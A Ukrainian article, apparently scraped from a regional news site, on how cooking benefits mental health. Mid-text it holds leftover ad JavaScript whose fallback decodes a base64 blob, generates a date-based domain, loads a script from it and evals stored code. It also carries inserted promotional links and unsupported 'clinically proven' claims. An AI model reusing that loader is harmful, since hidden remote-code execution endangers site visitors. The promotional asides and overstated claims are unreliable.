Нерідко можна почути похвали на адресу приготування їжі своїми руками. Приготування їжі пов’язане зі складними походами до продуктового магазину, великою кількістю брудного посуду, потенційним спрацьовуванням димової сигналізації та неїстівними стравами. З цих причин кулінарія може бути розділеним хобі: дехто з нас любить її, а дехто ненавидить.
Незалежно від того, на чиєму боці, клінічно доведено, що приготування їжі підтримує наше психічне здоров’я. Те саме можна сказати й про настільні ігри, що доступні навіть онлайн. Читайте далі, щоб дізнатися про різні способи приготування їжі, які можуть покращити ваш психічний стан, а також кілька ідей, як почати!
Приготування їжі сприяє зміцненню мозку
Чи знаєте ви, що деякі продукти харчування можуть підвищити вашу когнітивну діяльність? Дослідження, проведене у 2014 році, показало зв’язок між поганим психічним здоров’ям та нездоровим харчуванням.
І навпаки, збалансована дієта, позбавлена перероблених продуктів, може позитивно вплинути на вашу пам’ять та підтримати правильне функціонування нейротрансмітерів. Прикладом харчування, яке може посилити ці переваги психічного здоров’я, є середземноморська дієта. У цій дієті основна увага приділяється здоровим жирам, таким як оливкова олія, різноманітності фруктів та овочів, цільному зерну, рибі та мінімальній кількості червоного м’яса.
Важливо визнати, що термін «нездорова дієта» може бути засмучений і часто заперечує фактори, що призводять до вибору нездорової їжі, включаючи відсутність доступу та бідність.
Приготування їжі покращує соціальні зв’язки
Як часто в рецепті виходить лише одна порція? Доволі рідко. Їжа призначена для спільного вживання і приготування їжі дає легкий привід для створення спільноти. Це може бути просто відвідування фермерського ринку та спілкування з продавцями у пошуках ідей для рецептів.
Ви можете запросити приятеля, з яким експериментуватимете на кухні, або запросити близьких, щоб переламати хліб. Незалежно від вашого вибору, існує безліч шляхів для соціальної взаємодії, коли йдеться про їжу.
Кулінарія підвищує самооцінку
Коли наше психічне здоров’я страждає, нерідко страждає і наше ставлення себе. Якщо ми думаємо, що наш мозок працює неправильно, ця думка часто перетворюється на переконання, що ми не здатні зробити щось правильно.
Рецепт, який ви сподівалися довести до досконалості, може значно підвищити вашу самооцінку. Навіть якщо ця проста страва з трьох інгредієнтів (локшина, олія, пармезан — вуаля!), клінічно доведено, що приготування їжі значно підвищує впевненість у собі. Це тим, що почуття створення чогось відчутного, що може сподобатися іншим, може бути дуже приємним.
var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Приготування їжі допомагає виробити звичний порядок дня
Рутина настільки корисна для нашого мозку, що на її основі було створено окрему форму психотерапії. Міжособистісна та соціальна ритмотерапія — це форма психотерапії, що найчастіше застосовується до людей, які страждають на біполярні розлади.
Ця терапія визнає, що стресові життєві події та зміни у розпорядку дня можуть провокувати психічні розлади – у разі біполярного розладу це може сприяти початку депресивного чи маніакального епізоду.
Цей вид терапії вчить людей складати розклад, коли вони лягають спати, прокидаються та вживають їжу, а також інші щоденні дії. При дотриманні порядку денного наш циркадний ритм може стати збалансованим.
Циркадний ритм — це внутрішній годинник нашого організму, який регулює кортизол, гормон стресу, і мелатонін, гормон, що контролює цикл сну та неспання. Приготування їжі може стати основою вашого порядку дня, сприяючи тим самим покращенню загального самопочуття. Також можна почати день з перегляду інформаційного ресурсу. А https://www.avtomir.ua/ стане ідеальним варіантом такого сайту.
Як почати
На даний момент ви, можливо, погоджуєтесь з ідеєю приготування їжі для зміцнення психічного здоров’я, але не знаєте, з чого почати. Ось кілька ідей:
Подумайте про те, які страви вам найбільше подобаються. Можливо, ви любите їжу, яка здається вам надзвичайно лякаючою, щоб спробувати її самостійно, наприклад, суші або філе міньйон. Це нормально – ви все одно можете використати це як ідею про те, які смаки вам можуть сподобатися. Наприклад, ви можете спробувати запекти в духовці лосося або приготувати простий гамбургер на сковороді.Звертайтеся до свого оточення. Попросіть близьку людину показати вам кілька порад та хитрощів щодо приготування їжі, це може бути зручним способом почати. Крім того, це дає можливість соціальної взаємодії, яка може стати чудовою втіхою у важкі часи.
Незалежно від того, як ви вирішите почати, не дозволяйте страху чи нестачі впевненості залякати вас. Усі з чогось починають, а користь кулінарії для психічного здоров’я дає багато підстав, щоб почати.
(adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/yak-prigotuvannya-yizhi-mozhe-vplinuti-na-mentalne-zdorov-ya/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook